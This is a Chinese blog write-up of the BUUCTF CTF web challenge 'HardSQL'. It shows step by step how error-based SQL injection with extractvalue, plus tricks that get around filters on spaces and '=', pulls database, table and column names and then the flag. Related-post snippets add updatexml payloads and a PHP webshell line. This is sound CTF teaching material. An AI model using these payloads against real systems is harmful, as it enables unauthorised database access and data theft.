BUUCTF Writeup-Web-[极客大挑战 2019]HardSQL 1

最新推荐文章于 2024-04-19 18:32:25 发布
最新推荐文章于 2024-04-19 18:32:25 发布
阅读量3.5k 收藏 17
点赞数 9
分类专栏: ctf web 文章标签: web sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011718707/article/details/107405676
版权
ctf 同时被 2 个专栏收录
5 篇文章 0 订阅
订阅专栏
web
1 篇文章 0 订阅
订阅专栏

BUUCTF WriteUp

Web

[极客大挑战 2019]HardSQL 1

打开后提示sql注入,查看页面源代码:

image-20200717083318843

发现是get两个参数username和password到check.php

因此可以直接用hackbar构造……/check.php?username=aaa&password=aaa,并执行就可以了。用burpsuite直接改数据也行。

然后开始注入,尝试加’、"

image-20200717083820538

发现单引号有报错,双引号没有,没提示有括号,所以应该是普通单引号闭合的字符型注入点

image-20200717084154181

出现这行字说明输入的被过滤,一个字符一个字符测试,发现如and/空格/union/select/=//**/等都被过滤了。

  • 报错注入—>爆数据库名
check.php?username=aaa&password=aaa'^extractvalue(1,concat(0x7e,(select(database()))))%23

image-20200717104731608

​ 得到数据库名geek

  • 爆表名:得到表名H4rDsq1
username=aaa&password=aaa'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23
#语句主要用()绕过了空格,用like绕过了=号

image-20200717111115329

  • 爆列名:得到表名id/username/password
username=aaa&password=aaa'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23
#同上,语句不变改一下变量就行

image-20200717111850808

  • 找到flag
check.php?username=aaa&password=aaa'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))))%23
#这里要注意!select aaa from table_bbb;不需要引号!!!!!

image-20200717112621835

可是只显示了flag其中的一段。

剩下的用right()显示其他位数的

image-20200717122137437

试了一下得到三段

flag{054a272b-b502-44b5-a7fa-a2

a272b-b502-44b5-a7fa-a22ba996591

fa-a22ba9965913}

去重拼贴起来得到:

flag{054a272b-b502-44b5-a7fa-a22ba9965913}
醉卧
关注
  • 9
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
ustclug#hackergame2019-writeups#writeup-十次方根1
07-25
十次方根题解step 2: Use Hensel’s lifting to find roots over y3。
网鼎杯writeup-护网先锋1
08-04
3、得到 flag,截图如下图所示: 1、查看源代码可以发现存在代码泄露,代码如下: 2、在 get 中使用.可以绕过第一个判断 3、使用[email protected]
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup
BUUCTF关于sql注入的题目
最新发布
2302_80935968的博客
04-19 667
测试的时候输入了 1’ and ‘1’='1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
writeup-frontend:用AI击败作家的街区
04-29
科技栈 主要由Netlify,Material UI和React提供动力。 托管写入的静态资产。 因为太神奇了。 感谢您轻松构建可展示的页面。 感谢您构建了一个很棒的库来构建Web应用程序。 编辑器显示所有内容。 使用Create React App来构建它。 开始 git clone [email protected]:jeffshek/writeup-frontend.git cd writeup-frontend yarn install yarn start 设计 灵感来自设计灵感和代码 代码质量 这写得很快,所以我对我在回购中使用的一些反模式并不感到骄傲。 我不会用它来启发灵感。 与后端相比,我为后端回购感到骄傲。 编辑甚至更多:构建它的DevOps比我预期的要难得多。 在前端和后端的技术债务权衡之间,这只是一小段时间。 我对这里的代码质量感到有些尴尬,对不起... 我不
CTFShow-周末大挑战parse-url篇Writeup
05-19
CTFShow--周末大挑战parse_url篇Writeup
web buuctf [极客挑战 2019]HardSQL1
weixin_44214568的博客
03-15 1899
这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
非常经典的一道SQL报错注入题目[极客挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 1112
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
[极客挑战 2019]HardSQL 1
bring_coco的博客
09-23 5076
报错注入有两个函数,这里我们使用updatexml(a,b,c),此函数a,c必须为String类型,因此可以使a,c不为String型进行报错。得到id,username,password继续查询值。双写也被过滤掉了,同时空格,=,union也被过滤了。新知识:查不全时可用left(),right()经过一番查询知道right()查询后面部分。[极客挑战 2019]HardSQL。1.尝试输入数字或字母,都显示以下结果。发现flag并没有完全显示。两种方式都显示一样字样。4.我们尝试报错注入。
[极客挑战 2019]HardSQL1
whale_waves的博客
11-06 257
提示(最后有我自用的字典, 需要可以自取)拿到题目以后直接fuzz这里发现过滤了 '=' '空格以及空格的变式/**/' 'union' 但是updatexml还在还可以使用报错注入, 空格可以用()代替, 而=则可以用like代替payload:这里爆出表名H4rDsq1payload:出了字段, 现在查密码payload:到这里只显示了一半的flag接下来有两个函数可以使用right和substr首先right。
BUUCTF闯关日记--[极客挑战 2019]HardSQL1
qq_64201116的博客
05-17 434
以后遇到sql注入,我觉得应该先判断他过滤了什么东西,比如比较重要的 第一个:空格 第二个:and,or,select,#,--+ 第三个:'(单引号)和"(双引号) 第四个:注入使用的函数(可以挑你比较喜欢的顺手的或者简单的函数优先): sleep,if(布尔盲注) updatexml,concat(报错注入) order by,union(显错注入) load_file(DNS注入) 当然了还有一些database()等等,把你要走的路先测试一遍再进行渗透 否则你走到最
(一)[极客挑战 2019]HardSQL
qq_53856457的博客
11-25 2961
进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 1.首先,注数据库名称 username=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=1 当前数据库名:geek 2.然后得表名(过滤=,使用like代替) username=admin'or
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 4719
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 1857
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
BUUCTF-[极客挑战 2019]HardSQL 1
xixihahawuwu的博客
01-23 1050
检查页面元素 用get的方式请求两个参数username和password 利用hackbar工具 用户名和密码随便构造 在密码处尝试注入 发现单引号会报错,而双引号则不会,应该是普通单引号闭合的字符型注入点 尝试注入,发现对sql语句有过滤,并且存在着URL转码 union及select等函数同样被过滤 利用报错注入 /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(databa.
[极客挑战 2019]HardSQL1 解题思路
xiyuanyue的博客
10-13 176
flag{d23142e7-2546-47c3-b238-de只返回一部分flag是因为updatexml 函数返回错误信息长度是112个字符,所以要对password 截取一部分,可以通过,substr left right函数做处理 ,substr函数已经禁止,就用right函数。2、尝试联合注入、时间盲注 发现 and union /**/ /*!2、关键字替换(空格替换,单引号替换,等号替换);3、通过错误函数updatexml 获取数据库、表、字段。3、错误函数、时间盲注、条件盲注。
[极客挑战 2019]HardSQL 1(报错注入)
aaum556的博客
07-16 119
得到一半的flag:flag{62f71bc2-4189-48c7-a2c2-8b。order by查字段,union,堆叠注入,和输入数字都烦返回错误。输入1’,出错,1’#显示不同,存在单引号闭合注入。得到 id,username,password字段。得到后面缺少的flag为:322f9778f3}。mid被过滤了,right可以使用。=,空格,和好多关键字都被过滤了。空格用()绕过,=用like绕过。注:0x7e 是~符号的十六进制。空格被过滤,用()绕过,因此构造。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值